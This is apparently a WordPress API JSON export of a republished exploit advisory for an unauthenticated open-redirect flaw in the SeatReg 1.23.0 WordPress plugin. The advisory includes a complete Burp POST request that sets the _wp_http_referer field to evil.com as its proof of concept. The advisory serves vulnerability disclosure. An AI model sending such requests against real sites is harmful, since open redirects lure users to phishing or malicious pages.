{"id":28849,"date":"2022-08-01T21:43:55","date_gmt":"2022-08-01T17:43:55","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167888\/wpseatreg1230-redirect.txt"},"modified":"2022-08-02T08:38:13","modified_gmt":"2022-08-02T04:08:13","slug":"wordpress-seatreg-1-23-0-open-redirect","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/wordpress-seatreg-1-23-0-open-redirect\/","title":{"rendered":"WordPress SeatReg 1.23.0 Open Redirect"},"content":{"rendered":"

# Exploit Title: WordPress Plugin \u2018SeatReg\u2019 – Unauthenticated Open
\nRedirect
\n# Date: 01-08-2022
\n# Exploit Author: Mariam Tariq – HunterSherlock
\n# Vendor Homepage: https:\/\/wordpress.org\/plugins\/seatreg\/
\n# Version: 1.23.0
\n# Tested on: Firefox
\n# Contact me: mariamtariq404@gmail.com<\/p>\n

*#Description:*<\/p>\n

An Open Redirection is a vulnerability when a web application or server
\nuses an unvalidated user-submitted link to redirect the user to a given
\nwebsite or page.<\/p>\n

*#Example of Burp Request *
\n“`
\nPOST \/wp-admin\/admin-post.php HTTP\/1.1
\nHost: website.com
\nUser-Agent: Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0)
\nGecko\/20100101 Firefox\/103.0
\nAccept:
\ntext\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8
\nAccept-Language: en-US,en;q=0.5
\nAccept-Encoding: gzip, deflate
\nReferer: https:\/\/website.com
\nContent-Type: application\/x-www-form-urlencoded
\nContent-Length: 185
\nOrigin: https:\/\/website.com
\nConnection: close
\nCookie: {cookies_here}
\nUpgrade-Insecure-Requests: 1
\nSec-Fetch-Dest: document
\nSec-Fetch-Mode: Navigate
\nSec-Fetch-Site: same-origin<\/p>\n

new-registration-name=dedeed&action=seatreg_create_submit&seatreg-admin-nonce=11b1308e8a&*_wp_http_referer=https:\/\/evil.com
\n<https:\/\/evil.com>*&submit=Create+new+registration
\n“`
\n*#PoC Image:*<\/p>\n

https:\/\/ibb.co\/tCZWH0H
\nhttps:\/\/ibb.co\/5kh299z<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: WordPress Plugin \u2018SeatReg\u2019 – Unauthenticated Open Redirect # Date: 01-08-2022 # Exploit Author: Mariam Tariq – HunterSherlock # Vendor Homepage: https:\/\/wordpress.org\/plugins\/seatreg\/ # Version: 1.23.0 # Tested on: Firefox # Contact me: mariamtariq404@gmail.com *#Description:* An Open Redirection is a vulnerability when a web application or server uses an unvalidated user-submitted link to redirect …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-28849","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/28849","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=28849"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/28849\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=28849"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=28849"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=28849"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}